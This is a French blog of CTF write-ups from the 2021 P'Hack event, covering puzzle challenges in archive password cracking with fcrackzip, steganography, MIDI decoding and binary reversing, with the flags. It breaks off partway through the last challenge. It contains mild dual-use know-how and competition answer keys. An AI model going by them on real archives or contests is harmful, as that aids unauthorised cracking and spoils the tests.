Julien Mialon

P'Hack - Mise en bouche

Julien Mialon — Mon, 12 Apr 2021 17:26:35 GMT

3 challenges ont été release dans les semaines précédent le P'Hack pour nous mettre en appétit et patienter avant le début.

WE-3 (Checkmate)

Trois semaines avant le CTF, vous avez eu accès à un amuse bouche.
Format du flag : PHACK{}

Le fichier à l'intérieur de l'archive a été corrompu. Mais c'est quand même un chouette souvenir, donc vous voulez absolument le récupérer. Le flag sera le md5sum du fichier corrigé, gardez-le précieusement d'ici le début du CTF.
Il y a exactement 16 octets à corriger. Le mot de passe de l'archive est le nom d'une jolie ville de France, en minuscules.
Edit : Pas de panique, il y a trois possibilités, toutes valides !

Fichier: blog.julienmialon.com/uploads/ctf/phack/we3.tar.gz.zip

Première étape ici, il nous faut trouver le mot de passe de l'archive zip, une jolie ville de France ça pourrait être tout et n'importe quoi. On va d'abord récupérer la liste des villes de France sur le site de l'insee : https://www.insee.fr/fr/information/2028028 un gros copier coller à partir du fichier excel que l'on récupère nous permet d'avoir toutes nos villes. On colle ça dans un fichier texte.

Ce fichier texte, c'est bien mais les villes ne sont pas en minuscule, une petite commande bash

$ cat cities_upper.txt | tr '[:upper:]' '[:lower:]' > cities.txt

Et voilà, on a notre fichier pour cracker l'archive avec fcrackzip.

$ fcrackzip --use-unzip --dictionary -p cities.txt challenge.tar.gz.zip
PASSWORD FOUND!!!!: pw == briare

Maintenant qu'on a notre mot de passe, il ne reste plus qu'à dézipper cette archive et aller voir ce qu'il y a dedans. On y trouve un fichier nommé game_0128.bak et qui a le contenu suivant

e4.e?.Nf3.???.d4.exd4.Nxd4.Nxd4.?xd4.Nf6.e5.Nh5.g4.f6.gxh5.fxe5.?xe5+.B??.Nc3.d6.Qe4.???.Qxf5.Rf8.Qe4.h6.Bc4.Qd7.???.c5.Re1.b6.B??.Qxb5.Qxe7#

On compte ici le nombre de ? on obtient 16, ce sont donc les éléments à corriger. Le fichier ressemble à une partie d'échec, on va la rejouer pour essayer de trouver les informations sur les coups manquant. On va sur https://www.chess.com/analysis et on commence à rejouer notre partie jusqu'à trouver l'intégralité des coups manquant.
On fini avec la partie complète

e4.e5.Nf3.Nc6.d4.exd4.Nxd4.Nxd4.Qxd4.Nf6.e5.Nh5.g4.f6.gxh5.fxe5.Qxe5+.Be7.Nc3.d6.Qe4.Bf5.Qxf5.Rf8.Qe4.h6.Bc4.Qd7.Kd1.c5.Re1.b6.Bb5.Qxb5.Qxe7#

À noter qu'une alternative était également possible en trouvant cette version :

e4.e5.Nf3.Nc6.d4.exd4.Nxd4.Nxd4.Qxd4.Nf6.e5.Nh5.g4.f6.gxh5.fxe5.Qxe5+.Be7.Nc3.d6.Qe4.Bf5.Qxf5.Rf8.Qe4.h6.Bc4.Qd7.Kd2.c5.Re1.b6.Bb5.Qxb5.Qxe7#

il ne reste plus qu'à calculer le md5 de notre fichier réparé et on peut soumettre le flag suivant

PHACK{cb51e1b764c10a01c5983e99f3d8d386}

WE-2 (Zipline)

Deux semaines avant le CTF, vous avez eu accès à un amuse bouche.

on vient de trouver ce fichier sur une clé USB sur le trottoir en face de chez @lulu. On pense qu'il y a des infos intéressantes dessus. On vous laisse regarder !

Fichier : https://blog.julienmialon.com/uploads/ctf/phack/w2.zip

On dézippe l'archive, on obtient 2 fichiers : password.lst et flag.rar, on extrait flag.rar, on trouve une autre archive, on recommence, encore une autre... On doit pouvoir faire quelque chose de plus optimisé ici. Un petit script bash à la rescousse

#!/bin/bash

rm -rf flag
while true; do
    for archive in $(ls *.rar *.zip *.tar.gz 2>>/dev/null); do
        ext=${archive##*.}
        filename=${archive%.*}

        if [ "$ext" = "rar" ];then
            echo "rar file: $archive"
            unrar x $archive $filename/ >>/dev/null 2>> /dev/null
        elif [ "$ext" = "zip" ]; then
            echo "zip file: $archive"
            unzip $archive -d $filename >>/dev/null 2>> /dev/null
        elif [ "$ext" = "gz" ]; then
            echo "gz file: $archive"
            filename=${filename%.*}
            mkdir $filename
            tar xvf $archive -C ./$filename >>/dev/null 2>> /dev/null
        else
            echo "UNKNOWN file: $archive"
            exit
        fi

        cd $filename
    done
done

À chaque fois que le script se met en pause, on lui donne un mot de passe provenant du fichier fourni et contrairement à l'ordre dans le fichier, l'ordre des mots de passe est

@Eagleslam
@Vayne
@Pdrooo
@lulu

On se retrouve à la fin avec la sortie suivante :

gz file: P.tar.gz
zip file: H.zip
rar file: A.rar
gz file: C.tar.gz
zip file: K.zip
rar file: {.rar
gz file: R.tar.gz
zip file: 3.zip
rar file: a.rar
gz file: d.tar.gz
zip file: y.zip
rar file: _.rar
gz file: 4.tar.gz
zip file: _.zip
rar file: a.rar
gz file: _.tar.gz
zip file: z.zip
rar file: 1.rar
gz file: p.tar.gz
zip file: l.zip
rar file: 1.rar
gz file: n.tar.gz
zip file: 3.zip
rar file: _.rar
gz file: r.tar.gz
zip file: 1.zip
rar file: d.rar
gz file: 3.tar.gz
zip file: }.zip

Ok donc les noms des dernières archives forment le flag, on met cette sortie dans un fichier, on passe la commande suivante et on récupère le flag

$ cat out.txt | cut -d' ' -f3 | cut -d'.' -f1 | tr -d '[:space:]'
PHACK{R3ady_4_a_z1pl1n3_r1d3}

WE-1 (FlagClub)

Une semaine avant le CTF, vous avez eu accès à un amuse bouche.

Je vous transmets ce message que je viens de recevoir à votre attention :

La première règle du Flag Club est : il est interdit de parler du Flag Club.
La seconde règle du Flag Club est : il est interdit de parler du Flag Club.
Troisième règle du Flag Club : rassemblez cinq morceaux de secret pour reconstituer le flag.
Quatrième règle : les points rapportés par ce challenge uniquement seront dégressifs, en fonction du nombre de résolution.
Cinquième règle : coopérer ou non, mentir ou dire la vérité, la décision vous revient.
Sixième règle : pour ce challenge uniquement, les échanges d'informations entre les équipes sont autorisés.
Septième règle : le challenge continuera aussi longtemps que nécessaire.

    - Adi Shamir

Était également joint ceci :

15-d76439aa22a213f152efe19b351b19a78ad4d7eeba72a9a38944269499785a19a629d13655693005de16d9df293477c71c7e8e1e7af006746d4bf753e4b1345023c9aced288c92a00b24e22a901cbc3b4d7567392d8df641b2ed9637444413d359

Voyez ce que vous pouvez en tirer !

Un petit coup de Google sur Adi Shamir et on apprend qu'en plus d'avoir inventé RSA, il a aussi inventé une méthode de partage de secret https://en.wikipedia.org/wiki/Shamir's_Secret_Sharing. Du coup c'est clairement là dessus qu'on s'oriente. On commence à échanger les secrets avec les autres équipes, certaines nous donneront des faux, d'autre des vrais... On a de toute manière aucun moyen de les vérifier pour le moment.

Une fois 5 bouts de secret en notre possession, on tente de décrypter avec ssss-combine bon a priori on en a au moins un de faux dans cette histoire, on continue notre chasse au secret jusqu'à en récupérer une dizaine. À ce moment là il nous faut tester toutes les combinaisons de 4 + le notre pour trouver le flag. On écrit un petit script python pour générer ça pour nous :

import random
import itertools
import os

good="15-d76439aa22a213f152efe19b351b19a78ad4d7eeba72a9a38944269499785a19a629d13655693005de16d9df293477c71c7e8e1e7af006746d4bf753e4b1345023c9aced288c92a00b24e22a901cbc3b4d7567392d8df641b2ed9637444413d359"

items = [
"14-b02a048aa9cad4fe1ea3e0d206ed49ab081be6ce85fb38263c3803494e59d357db9a4eebfcbee0e4b57f5f837025e2dd9f3e583c37d9c61351a2dd100aaf3f87f3e94eed849830fe11390904ff009521e318126336cde45052f963b2a6395e2677",
"29-4f05311b227c65a883bb76946a7745557551617d08acbf522cd21541d79164d42aa080a03ec69ae9dd8bbac3273c724847bea4c35604e59cfb6a3f00853829416d894ab90f13afdf405e0839dae080165d81ceaf932f37b4a91de83aaf695c6780",
"01-e31f57a97d924f8dc38b840d745f1df88a70517075498ba751f6c59a15766e6b98a86235eaef26d213dcdc5b8f6d627e02158c6e4d31187b25af27f933f13bd2c7c7ebbb434b11962089f56646b8a9d7b33eda50033fc4dacbe1170b79277256b6",
"22-eb9075cb28f7fb2752b141f2db3fce9d40dc86ea40d87ba0360f4be4ab844818b7e1c3b02fd2caf8ffe1c80513df3f28f6477a597f9c0128e3d0f9645d61bad74542efceae9519d7613da514d277d4687cdd66d6251f2c049e8f863fa5734c3c1e",
"23-439352a2a6f0091424d7dc4d2a56f58bb98d974518b732e7c12931b7b9c4e96f7354d724c08c571fb1eace80c144e5571303ab4c26f8e9996aec502336b0799d142448ba07950d289dd7f555bdbf4290e8e7c62ecf75c2624884ab8aa148c905ff",
"26-740c4aec357d902cbf3466d454009fa60afc922ece84b756a72743939be3d8bd83bb61e283f88169d507dd08b9c34fbf8ddeb7ae2b52c7c0c67482118d34c723974481b37d73126f08ae5f5689c6de4c6f42ceb7721b2d32f2371e110f344b2381",
"38-4b8af6c974828dd6c60ab544e3c273a8b7c1b4ee773076982ef70ddab62944798c43eb62f1cc25d989d26e02ade2132ee3d18d619b20a5126a94b02d0144152a22e9e303ee4ae22e08f59a5663428146a605b26c3ded23f9f1cca6ef07a2f0f6b5",
"41-7823d706020876f8012e40e6764df2e5799e10cd0fe6691dcbdf3d918f39c7808aa0fe887c46a26337ba176fd1b1e828f44e7f3ed8b80a0849c94f8c6231f92861d02ea0a61ad5d01e8129441eb1b5c2bf9477cc2a229453d585b2d988bf5b44ed",
"49-cc4a369161b116284dd799e608d67e482daf1ee5609cc441a15aeb00b1f9d8b21666edc9fbdca3cdce9c091088167cba793b7048ad710a2b62708d45b2f8f9c0b89dcda0a16a5178478b083d9f25f0d8b94d90299805900073f085fbcfd85bfc96",
"09-e9bef1226c045c195fa8df6fc85cbbe7f4379fc039855dd4b9f1b9c242c997b8d9fefd45196700ef92b8be9f8347f517179fa1bc5e7d9ba16ce32e402ef7a9a49b9762cdf1fbd8850662f6e573d667939a39ca6ec1e496428a854565a9c1d37685"
]
result=list(itertools.combinations(items, 4))
for i in result:
    i = list(i)
    i.append(good)
    data = '\n'.join(i) + '\n'
    f = open('input.txt', 'w')
    f.write(data)
    f.close()
    print("Test with: ", list([x.split('-')[0] for x in i]))
    os.system('ssss-combine -t 5 < input.txt 2>> out.txt')

Itertools nous génère toutes les combinaisons, on génère un fichier contenant notre bout de secret + les 4 de chaque combinaison qu'on passe ensuite à la commande ssss-combine. (On redirige la sortie d'erreur parce que le résultat est écrit dans la sortie d'erreur avec cet outil...) Un grep sur le fichier résultant et on trouve le flag

PHACK{And the eighth and final rule, if this is your first night at Flag Club, you have to flag!}

Et il s'avère que sur 10 secrets récupérés, seuls 5 étaient valides.

P'Hack - Stegano

Julien Mialon — Mon, 12 Apr 2021 16:19:02 GMT

Strong Daddy - 128pts

Ton pote se vante car son père est militaire dans l'armée de terre et il lui aurait soit-disant appris toutes les techniques pour pouvoir échanger des messages sans que l'ennemi ne puisse comprendre.

Il est temps de montrer à cette tête de noeud qu'il n'est pas aussi fort qu'il le prétend

Papa Alpha Papa Alpha
Hotel Oscar Tango Echo Lima
Alpha Lima Papa Hotel Alpha
Charlie Hotel Alpha Romeo Lima India Echo
Kilo India Lima Oscar
Alpha Charlie Charlie Oscar Lima Alpha Delta Echo Golf Alpha Uniform Charlie Hotel Echo
Whisky Hotel India Sierra Kilo Yankee
Tango Hotel Romeo Echo Echo
India November Delta India Alpha
Romeo Oscar Mike Echo Oscar
Delta Echo Lima Tango Alpha
Tango Hotel Romeo Echo Echo
Sierra India Echo Romeo Romeo Alpha
Tango Alpha November Golf Oscar
Uniform November Delta Echo Romeo Sierra Charlie Oscar Romeo Echo
Foxtrot India Victor Echo
Tango Alpha November Golf Oscar
Tango Hotel Romeo Echo Echo
Golf Oscar Lima Foxtrot
Alpha Lima Papa Hotel Alpha
November Oscar Victor Echo Mike Bravo Echo Romeo
Zulu Echo Romeo Oscar
Uniform November Delta Echo Romeo Sierra Charlie Oscar Romeo Echo
Tango Hotel Romeo Echo Echo
Victor India Charlie Tango Oscar Romeo
Tango Hotel Romeo Echo Echo
Romeo Oscar Mike Echo Oscar
Alpha Charlie Charlie Oscar Lima Alpha Delta Echo Delta Romeo Oscar India Tango Echo

Tout ça ressemble beaucoup à un message radio où on utilise un mot au lieu d'épeler chaque lettre pour être sur de la bonne récéption. Un petit tour sur Wikipédia nous en apprend un peu plus.

NATO phonetic alphabet - Wikipedia

Wikimedia Foundation, Inc.Contributors to Wikimedia projects

On se rend compte ici que récupérer uniquement les lettres majuscules à l'air d'être suffisant pour récupérer un message un peu plus lisible. On voit notamment que les premières lettres des 5 lignes forment le mot PHACK, ça semble être une bonne piste. On met tout ça dans un fichier input.txt et un petit coup de la commande sed va nous permettre de se débarasser des minuscules et des espaces.

$ cat input.txt | sed 's/[a-z ]//g'
PAPA
HOTEL
ALPHA
CHARLIE
KILO
ACCOLADEGAUCHE
WHISKY
THREE
INDIA
ROMEO
DELTA
THREE
SIERRA
TANGO
UNDERSCORE
FIVE
TANGO
THREE
GOLF
ALPHA
NOVEMBER
ZERO
UNDERSCORE
THREE
VICTOR
THREE
ROMEO
ACCOLADEDROITE

On voit un pattern émerger ici, pour la plupart des mots qu'il nous reste, il suffit de récupérer leur première lettre. À l'exception des chiffres et des deux mentions ACCOLADEGAUCHE et ACCOLADEDROITE. On réécrit tout ça avec un seul caractère pour chaque ligne et on récupère un flag où je ne m'y connais pas !

PHACK{W3IRD3ST_5T3GAN0_3V3R}

Caumunikassion - 128pts

Le nouveau stagiaire en communication du P'Hack CTF nous semble étrange. Nous avons peur qu'il utilise ses compétences pour exfiltrer des informations sensibles. Il a principalement travaillé sur le site https://ctf.phack.fr.

On récupère ici le logo de l'évènement et on le passe dans https://aperisolve.fr/ pour découvrir une URL cachée dans l'image dans les données EXIF : https://pastebin.com/raw/xjyzhxYZ. Une fois le pastebin ouvert, on récupère le flag.

PHACK{e4sy_st3g4n0_rigH7?}

L'image est disponible ici : https://blog.julienmialon.com/uploads/ctf/phack/phack_white.png

Chasse aux oeufs - 128pts

Nous n'avons pas pu vous organiser une chasse aux oeufs IRL. Pour compenser nous vous laissons trouver le flag dans cette chasse aux oeufs virtuelle.

Fichier disponible ici https://blog.julienmialon.com/uploads/ctf/phack/easter-eggs.png

On se retrouve ici avec une illustration et d'après le challenge, il faut trouver les oeufs. Un petit tour dans aperi'solve ne donne rien, on se met donc à la recherche manuelle des oeufs dans l'image. Au bout de quelques minutes on a nos 14 oeufs

Après avoir vainement essayé de relier les oeufs entre eux pour voir ce que ça pouvait donner et n'avoir obtenu aucun résultat, on extrait les oeufs dans un fichier à part pour que ce soit plus clair

Et là, il y a deux choses qui saute aux yeux :

Premièrement, chaque oeuf est d'une couleur unie
Deuxièmement on en a tout de même plusieurs dans des tons très proche (violet, vert moche)

Souvenir d'un ancien CTF, est-ce que les codes RGB de chaque couleur pourrait être un indice ? On est parti pour extraire chaque code couleur

01 #504841
02 #434B7B
03 #5F4567
04 #676333
05 #6C6C33
06 #6E745F
07 #636834
08 #6C6C33
09 #6E6733
10 #5F3173
11 #6E2774
12 #5F6974
13 #5F3F21
14 #3F5F7D

Vu les plages de valeur en hexa, j'ai bien envie d'en faire de l'ascii pour voir ce qu'il en ressort. On met tout ça en une ligne avec un espace entre chaque doublet hexa :

50 48 41 43 4B 7B 5F 45 67 67 63 33 6C 6C 33 6E 74 5F 63 68 34 6C 6C 33 6E 67 33 5F 31 73 6E 27 74 5F 69 74 5F 3F 21 3F 5F 7D

On utilise ensuite un convertisseur en ligne https://www.rapidtables.com/convert/number/hex-to-ascii.html et on obtient le flag.

PHACK{_Eggc3ll3nt_ch4ll3ng3_1sn't_it_?!?_}

Alter Egg-o - 256pts

L'agent Smith de la HSA (Hack Secret Agency) a retiré trop rapidement la clé USB de son PC (ce n00b !!). La preuve qu'il voulait vous montrer semble corrompue.

Montrer lui que vous pouvez lui sauver la mise et récupérer ce fichier.

Fichier disponible ici https://blog.julienmialon.com/uploads/ctf/phack/altered.png

Franchement cet agent Smith il aurait pu faire attention non ? Bon, est-ce qu'on peut quand même faire quelque chose pour lui ? On tente d'ouvrir le fichier et on reçoit une belle erreur "format de fichier non pris en charge".

On tente la commande file qui pourrait nous indiquer si contrairement à son extension, ce n'était pas un fichier PNG mais autre chose :

$ file altered.png 
altered.png: data

Si file ne reçonnait pas ce que c'est non plus, on sort l'artillerie lourde et on lance binwalk pour savoir ce qu'il nous trouve dans le fichier

$ binwalk altered.png 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
64            0x40            Zlib compressed data, best compression
8596          0x2194          Zlib compressed data, best compression

Des données compréssées avec Zlib, bon ça ressemble bien à un PNG cette histoire. Il est temps d'aller faire un tour avec un éditeur hexa dans ce fichier.

Et là, on voit un header de fichier qui commence par DEADBEEF on va faire un tour du côté de la spécification des fichiers PNG http://www.libpng.org/pub/png/spec/1.2/PNG-Structure.html et on s'aperçoit que le header d'un fichier PNG est composé de 8 octets constants. Ici les 4 premiers ont été altéré. Rectifions ça.

Parfait, on ouvre maintenant notre image et tout s'affiche correctement !

On récupère le flag et on est bon !

PHACK{ju5t_ch4ng3d_a_m4gic_nUmb3R_i5_i7_b4d?}

Petite astuce ici si comme moi vous avez la flemme de recopier le flag depuis l'image : https://azure.microsoft.com/en-us/services/cognitive-services/computer-vision/#features on upload l'image sur ce lien en spécifiant l'action "Read Text" et on récupère le texte en quelques secondes.

Aliens - 256pts

Enfiiiiin!! Nous avons finalement reçu une réponse à nos signaux intergalactiques. Un son a été capté et enregistré venant de l'espace. C'est sûr ça doit vouloir dire quelque chose.

Fichier disponible ici https://blog.julienmialon.com/uploads/ctf/phack/weird.wav

On tente dans un premier temps de lire le fichier son, on entends quelque chose qui pourrait correspondre à du morse dans un premier temps puis un passage qui ne ressemble à rien avant de finir sur quelque chose qui pourrait être du morse.

On ouvre le fichier dans Audacity et on obtient la visualisation suivante

Rien ne semblait concluant à partir de là, je suis donc parti sur complétement autre chose en cherchant des informations dans les bits de poids faible où en tentant de passer le fichier en stéréo alors qu'il est en mono à la base. La solution était bien plus simple ! Il suffisait d'afficher le fichier en mode spectrogramme dans Audacity.

Et on peut lire relativement clairement le flag

PHACK{i7_s0uNds_l1k3_w3jd3n3}

Une Douce Petite Musique - 256pts

Avec vos talents de hacker vous interceptez un échange plutôt louche.

https://blog.julienmialon.com/uploads/ctf/phack/message1.eml

https://blog.julienmialon.com/uploads/ctf/phack/message2.eml

On a donc deux emails ici, commençons par les lire, le premier :

Coucou Patoche,
Ci-joint le secret qu'il te manquait pour m'envoyer un message sécurisé.
Bisous

Avec un fichier joint sous format .ods

Et le second message :

Coucou David,
Ci-joint un message super secret, personne ne va jamais trouver avec notre technique futuriste !
XOXO
--
Patricia

Avec en pièce jointe un fichier son midi. On tente de lire le fichier, un joli son de piano en sort, aucun morceau connu en tout cas. On passe notre fichier son dans https://solmire.com/miditosheetmusic/ pour récupérer la partition.

La dernière notre est la plus haute de toute la partition, c'est un La, autrement noté A dans la notation américaine, si jamais cette partition correspond à notre flag, ça matcherait avec le tableau qu'on avait au début. Bon par contre soyons clair, il est hors de question, vu le nombre de note, de décoder ça à la main. On vérifie tout de même les premières pour être sur de notre théorie, on obtient PHACK si on suppose que le sol de la clé de sol correspond au sol deuxième ligne de notre tableau.

On va charger notre fichier midi avec python et voir ce qu'il y a dedans

from mido import MidiFile

file = MidiFile('musique1.mid', clip=True)
print(file)

for track in file.tracks:
    print(track)
    for msg in track: 
        print(msg)

$ python read_music.py 












note_on channel=0 note=55 velocity=105 time=2881
note_off channel=0 note=55 velocity=0 time=479
note_on channel=0 note=93 velocity=80 time=1
note_off channel=0 note=93 velocity=0 time=479
[...]

On observe une première track qui contient quelques meta data mais rien de plus, on peut donc l'ignorer et la partie qui nous intéresse commence sur la deuxième track avec toutes les notes. On va faire évoluer un peu notre script pour récupérer les valeurs des notes justement.

from mido import MidiFile

file = MidiFile('musique1.mid', clip=True)
notes=[]
for track in file.tracks:
    for msg in track: 
        if msg.type == 'note_on':
            notes.append(msg.note)
print(*notes)

$ python read_music.py 
55 93 67 81 59 54 66 67 83 83 64 90 62 95 66 83 62 66 76 62 64 66 67 83 83 64 90 62 95 66 83 62 66 76 62 64 66 62 60 66 76 67 88 95 62 66 71 67 86 57 62 95 66 83 62 57 66 71 88 67 72 83 62 57 66 62 60 66 83 62 57 66 71 88 62 64 48 66 67 83 83 64 90 62 95 66 83 62 66 76 62 64 66 67 83 83 64 90 62 95 66 83 62 66 76 62 64 66 62 60 66 78 79 88 95 66 74 95 67 86 71 88 95 66 83 67 66 76 83 67 90 90 62 66 71 67 86 57 66 78 79 57 66 84 62 64 48 66 67 83 83 64 90 62 95 66 83 62 66 76 62 64 66 105

On tient quelque chose là, on va récupérer les valeurs min et max pour obtenir l'intervalle [48-105] ça parait cohérent (5 octaves, 12 demi-tons par octave, on s'attend à avoir un intervalle de cet ordre). Ce qui nous rassure en plus c'est que le nombre de note unique est de 25 soit moins que le nombre de cellule dans notre tableau. On obtient facilement la liste des notes ordonées :

48 54 55 57 59 60 62 64 66 67 71 72 74 76 78 79 81 83 84 86 88 90 93 95 105

Et il ne nous reste plus qu'à savoir comment faire matcher le tableau secret qu'on a eu au début et nos notes. On va essayer d'associer les valeurs des notes midi avec leurs valeurs dans la notation américaine, peut être qu'on y vera plus clair. On part du tableau suivant, la seule subtilité ici sera de ne pas se tromper avec les demi-tons mi-fa et si-do alors qu'il y a un ton complet entre les autres notes.

Les notes ainsi obtenu vont de C3 (48) jusqu'à A7 (105). Il semblerait qu'on ai juste a prendre notre tableau et à lui faire +2 sur les lignes et on devrait obtenir la correspondance que l'on souhaite.

from mido import MidiFile

file = MidiFile('musique1.mid', clip=True)
notes=[]
for track in file.tracks:
    for msg in track: 
        if msg.type == 'note_on':
            notes.append(msg.note)
print(*notes)
print("min", min(notes))
print("max", max(notes))
print("set count", len(set(notes)))

table = list(sorted(list(set(notes))))
print(*table)
mapped = []
baseline=['C', 'C', 'D', 'D', 'E', 'F', 'F', 'G', 'G', 'A', 'A', 'B']
for note in table:
    basenote = note % 12
    octave = int(note / 12) - 1
    mapped.append((note, baseline[basenote]+str(octave)))

# print(*mapped, sep='\n')

decoder = [
    "SKXJZ{P",
    "WDTEU_A",
    "CLBGFVO",
    "HRYNIMQ",
    "}"
]
for note in notes: 
    basenote = note % 12
    octave = int(note / 12) - 4
    letter = baseline[basenote]
    letterIndex = ord(letter) - ord('A')
    print(decoder[octave][letterIndex], end='')
print("")

Le script python nous permet de récupérer le flag sans aucun problème, la version condensé du script, nettoyée des éléments inutiles :

from mido import MidiFile

file = MidiFile('musique1.mid', clip=True)
baseline=['C', 'C', 'D', 'D', 'E', 'F', 'F', 'G', 'G', 'A', 'A', 'B']
decoder = [ "SKXJZ{P", "WDTEU_A", "CLBGFVO", "HRYNIMQ", "}" ]
for track in file.tracks:
    for msg in track: 
        if msg.type == 'note_on':
            octave = int(msg.note / 12) - 4
            letter = ord(baseline[msg.note % 12]) - ord('A')
            print(decoder[octave][letter], end='')
print("")

Et le résultat :

$ python read_music.py 
PHACK{_ALLUMER_LE_FEU_ALLUMER_LE_FEU_ET_FAIRE_DANSER_LES_DIABLES_ET_LES_DIEUX_ALLUMER_LE_FEU_ALLUMER_LE_FEU_ET_VOIR_GRANDIR_LA_FLAMME_DANS_VOS_YEUX_ALLUMER_LE_FEU_}

On pourra dire ce qu'on veut, la version originale est quand même mieux que la version midi fournie ici :D

P'Hack - Reverse

Julien Mialon — Mon, 12 Apr 2021 16:18:55 GMT

Tendu comme un slip - 64pts

Vous vous souvenez de la clé USB d'il y a quelques semaines ?
On a oublié de vous dire qu'il y avait ce fichier aussi.
On doit sûrement pouvoir en tirer quelque chose..

https://blog.julienmialon.com/uploads/ctf/phack/tendu

Un simple appel à strings nous permet ici de récupérer le flag

$ strings tendu

PHACK{s1mplY_5tr1ng5_i7}

No strings - 128pts

Encore un drôle de fichier.
Votre expertise nous est très utile.

https://blog.julienmialon.com/uploads/ctf/phack/no-strings

Bon ici, on lance notre décompilateur favori et on va voir ce qu'il se passe, on récupère une fonction main qui malheureusement ne fait pas grand chose

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[56]; // [rsp+0h] [rbp-40h] BYREF
  unsigned __int64 v5; // [rsp+38h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  printf("> ");
  fgets(s, 50, _bss_start);
  puts(&::s);
  return 0;
}

Quoiqu'il arrive, elle affichera toujours la même chose. En parcourant la liste des fonctions disponible, on tombe sur display_flag, ça semble prometteur. Pour le coup le code paraît beaucoup plus intéressant :

unsigned __int64 display_flag()
{
  char src; // [rsp+2h] [rbp-6Eh] BYREF
  char v2; // [rsp+3h] [rbp-6Dh] BYREF
  // [...]
  unsigned __int64 v38; // [rsp+68h] [rbp-8h]

  v38 = __readfsqword(0x28u);
  v31 = "i_t33Am4_rdRfii";
  v32 = "Ce7d_K_hH0{}nP5";
  strcpy(dest, "Well done! The is ");
  v34 = 0LL;
  v35 = 0LL;
  v36 = 0LL;
  v37 = 0;
  src = aCe7dKHh0Np5[13];
  strncat(dest, &src, 1uLL);
  v2 = v32[8];
  strncat(dest, &v2, 1uLL);
  v3 = v31[5];
  strncat(dest, &v3, 1uLL);
  v4 = *v32;
  // [...]
  strncat(dest, &v29, 1uLL);
  v30 = v32[11];
  strncat(dest, &v30, 1uLL);
  puts(dest);
  return v38 - __readfsqword(0x28u);
}

Il semble que le flag soit créé caractère par caractère dans cette méthode. Je me doute qu'il est tout à fait possible de copier/coller le code et de l'exécuter et il y a des chances qu'on récupère le flag sans problème. Néanmoins, puisque la méthode se donne la peine de faire un puts une fois que le flag est construit, on va tenter une méthode plus simple en lançant l'exécutable avec gdb.

$ gdb no-strings
(gdb) br main # on set un breakpoint au démarrage de la fonction main
Breakpoint 1 at 0x1623
(gdb) run
Starting program: no-strings 
Breakpoint 1, 0x0000555555555623 in main ()
(gdb) call display_flag()
Well done! The is PHACK{r34d_it_fR0m_th3_in5ide}
$1 = 0

Et voilà on obtient le flag très simplement. (On notera d'ailleurs le mot manquant entre The et is ;-)

PHACK{r34d_it_fR0m_th3_in5ide}

Military Grade Password - 512pts

Fraichement arrivé dans l'armée, vous avez déjà perdu votre identifiant pour accéder à l'intranet.

Dépêchez-vous de le retrouver avant que quelqu'un ne s'en aperçoive ! Le flag est attendu au format PHACK{identifiant}

https://blog.julienmialon.com/uploads/ctf/phack/military_grade_password.zip

Idem que le précédent, on commence par charger le fichier dans le décompilateur, on récupère la fonction main sans trop de problème.

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char input[104]; // [rsp+0h] [rbp+0h] BYREF
  unsigned __int64 vars68; // [rsp+68h] [rbp+68h]

  vars68 = __readfsqword(0x28u);
  puts("55th Infantry Division identify checker");
  printf("Personal access ID: ");
  __isoc99_scanf("%s", input);
  if ( sub_1530(input) )
    puts("[+] ACCESS GRANTED!");
  else
    puts("[+] ACCES REJECTED!");
  return 0LL;
}

Contrairement au précédent, on voit cette fois ci que l'input sert à quelque chose puisqu'elle est passée à la méthode sub_1530 pour être vérifié, on va de ce pas voir cette méthode

_BOOL8 __fastcall sub_1530(char *a1)
{
  int v1; // esi
  int v2; // er9
  int v3; // er8
  int v4; // ecx
  int v5; // edx
  _BOOL4 v6; // er10
  int v8; // er12
  int v9; // er14
  int v10; // er15
  int v11; // ebp
  int v12; // [rsp+0h] [rbp-5Ch]
  int v13; // [rsp+8h] [rbp-54h]
  int v14; // [rsp+Ch] [rbp-50h]
  int v15; // [rsp+10h] [rbp-4Ch]
  int v16; // [rsp+14h] [rbp-48h]
  int v17; // [rsp+18h] [rbp-44h]
  char v18; // [rsp+1Ch] [rbp-40h]
  int v19; // [rsp+20h] [rbp-3Ch]
  int v20; // [rsp+24h] [rbp-38h]
  int v21; // [rsp+28h] [rbp-34h]

  v1 = a1[6];
  v2 = a1[14];
  v3 = a1[12];
  v4 = a1[10];
  v5 = a1[13];
  v6 = 0;
  if ( v2 * v1 * (v5 ^ (v3 - v4)) == 16335 )
  {
    v8 = a1[7];
    v9 = a1[18];
    v12 = a1[15];
    v18 = a1[1];
    if ( ((char)(a1[18] ^ v18) ^ (v12 - v8)) == 83 )
    {
      v14 = a1[17];
      v13 = a1[16];
      v15 = a1[5];
      v16 = a1[9];
      v17 = *a1;
      if ( (v14 - v13) * (v17 ^ (v16 + v15)) == -5902 )
      {
        v19 = a1[3];
        v10 = a1[11];
        if ( v19 - v10 == 11 )
        {
          v11 = a1[4];
          v21 = a1[2];
          v20 = a1[8];
          if ( (v20 ^ (v11 + v21)) == 3
            && v20 + v12 - v11 == 176
            && (v1 ^ ((char)(v4 ^ a1[9]) - v9 - v10)) == -199
            && v21 * v13 + v18 * (char)(*a1 ^ a1[17]) == 9985
            && v5 * v2 - v8 == 2083
            && v3 + v19 - v15 == 110
            && v5 + v16 + v4 * v20 == 5630
            && v15 - v13 - v17 - v21 == -182
            && v14 * (char)(v2 ^ a1[7]) == 7200
            && v18 * v19 + v10 * v1 == 17872
            && v3 - v12 - v11 * v9 == -5408
            && v19 * v12 + v21 * v10 == 18888
            && v13 * (v15 + v5) == 15049
            && v14 * (v4 + v17) == 12150
            && (char)(v2 ^ v1) * v9 == 10080
            && v8 + v3 - v11 == 132 )
          {
            v6 = v16 * v18 + v20 == 2453;
          }
        }
      }
    }
  }
  return v6;
}

On est dans le cas typique d'un système d'équation où la string qu'on fourni en entrée doit valider les différentes conditions pour être valide. On renomme toutes les variables pour qu'elles aient un nom qui correspond à l'indice dans le tableau en entrée et on extrait les différentes conditions pour obtenir

id3 - id11 == 11
id12 + id3 - id5 == 110
id7 + id12 - id4 == 132
id8 + id15 - id4 == 176
(id8 ^ (id4 + id2)) == 3
id3 * id15 + id2 * id11 == 18888
id5 - id16 - id0 - id2 == -182
id16 * (id5 + id13) == 15049
id12 - id15 - id4 * id18 == -5408

((id18 ^ id1) ^ (id15 - id7)) == 83
id1 * id3 + id11 * id6 == 17872
